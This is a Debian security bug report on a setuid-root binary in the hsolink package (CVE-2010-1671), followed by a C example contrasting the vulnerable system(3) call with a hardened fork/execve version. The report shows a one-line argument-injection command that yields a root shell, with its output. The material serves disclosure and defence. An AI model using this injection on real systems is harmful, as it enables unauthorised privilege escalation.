
Bug#590670: insecure setuid usage, local root exploit

Package: hsolink
Version: 1.0.118-3
Severity: critical
Tags: security


The following was reported by Christian Jaeger.


hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root.
The binary

- neither sets PATH
- nor fixes other environment variables
- nor checks commandline arguments
- but uses system(3)
(- and may be overflowing fixed-size buffers as well, I didn't check anymore)

and thus is a trivial target to get root, for example:

(I've tested from the files in an ar-unpacked .deb instead of
installing the deb, to avoid exposing my system. Note: apparently the
binary has to be at root-owned paths or the Linux kernel will ignore
the setuid bit.)

novo:~/chris# l -a
total 12
-rwsr-xr-x  1 root root  7072 2010-07-09 22:20 hsolinkcontrol
drwxr-x---  2 root chris   80 2010-07-09 22:55 .
drwxr-xr-x 50 root root  4272 2010-07-09 22:55 ..

chris@novo:/root/chris$ ./hsolinkcontrol down '; bash'
Using resolvconf.
root@novo:/root/chris# id
uid=0(root) gid=1000(chris) groups=.....

The setuid recommendation is coming from the upstream author
(http://www.pharscape.org/hsolinkcontrol.html), who apparently is not
aware of the implications of the setuid bit, and good security in
general as evidenced by the problems I've listed above. I have not
informed him of the problem [yet].

I don't know about the right solution; maybe using sudo instead of
setuid and adding commandline argument checking and replacing system
calls with fork/exec* calls. Or, to be safer, instead rather turn it
into a daemon. Iff it needs to be run as ordinary users at all--I'm
used to having to run "pon" as root, for example--the charge to enable a
normal user to run hsolinkcontrol (or the program that uses it) as
root (by setting up sudo, for example) could possibly just be left to
the user (I can't say as I haven't used the program yet).


Debian has assigned CVE-2010-1671 to this issue.
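The pattern the report describes, as an added example that is not part of the bug report and not hsolinkcontrol's own code: a setuid-root program that splices its first argument into a shell command for system(3), next to the fork/execve replacement the report suggests. HELPER_PATH (here /bin/true) stands in for whatever helper the real binary invokes, and the up/down whitelist is an assumption about the actions it accepts; both are hypothetical, not taken from the package.

```c
/* Added example, not hsolinkcontrol's code.  Reconstructs the reported
 * pattern (system(3) with an unchecked argv[1], PATH inherited from the
 * caller) in minimal form and shows a hardened replacement.
 * HELPER_PATH is a hypothetical stand-in for the real helper. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

#define HELPER_PATH "/bin/true"   /* assumption: stands in for the real helper */

/* Vulnerable pattern: the user-controlled action is pasted into a shell
 * command line.  Returns the string system(3) would hand to "sh -c",
 * so the injection ("down; bash") is visible without executing it.
 * Returns 0 on success, -1 if the buffer is too small. */
int build_vulnerable_command(const char *action, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "%s %s", HELPER_PATH, action);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened step 1: accept only a fixed set of actions, compared whole,
 * so shell metacharacters or extra words can never get through. */
int is_valid_action(const char *action) {
    static const char *const allowed[] = { "up", "down" };   /* assumed set */
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(action, allowed[i]) == 0)
            return 1;
    return 0;
}

/* Hardened step 2: fork/execve with an absolute path, a fixed argv and a
 * fixed environment.  No shell parses anything, and PATH, IFS, LD_* and
 * the rest of the caller's environment never reach the child.
 * Returns the child's exit status, or -1 if the action is rejected,
 * fork fails, or the helper cannot be executed. */
int run_action(const char *action) {
    if (!is_valid_action(action))
        return -1;
    char *const argv[] = { HELPER_PATH, (char *)action, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(HELPER_PATH, argv, envp);
        _exit(127);                       /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return code == 127 ? -1 : code;
}

int main(int argc, char **argv) {
    const char *action = argc > 1 ? argv[1] : "down; bash";
    char cmd[256];
    if (build_vulnerable_command(action, cmd, sizeof cmd) == 0)
        printf("system(3) would run: sh -c '%s'\n", cmd);
    printf("run_action(\"%s\") -> %d\n", action, run_action(action));
    return 0;
}
```

Run with the report's payload (`./a.out 'down; bash'`) and the first line shows the exact command line system(3) would pass to the shell, while run_action rejects it before anything is executed; with a plain `down` the helper runs with a clean environment. Moving the helper behind sudo, as the report suggests, would remove the setuid bit entirely, but the argument whitelist and the execve-with-fixed-env pattern are still what a privileged wrapper should do.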

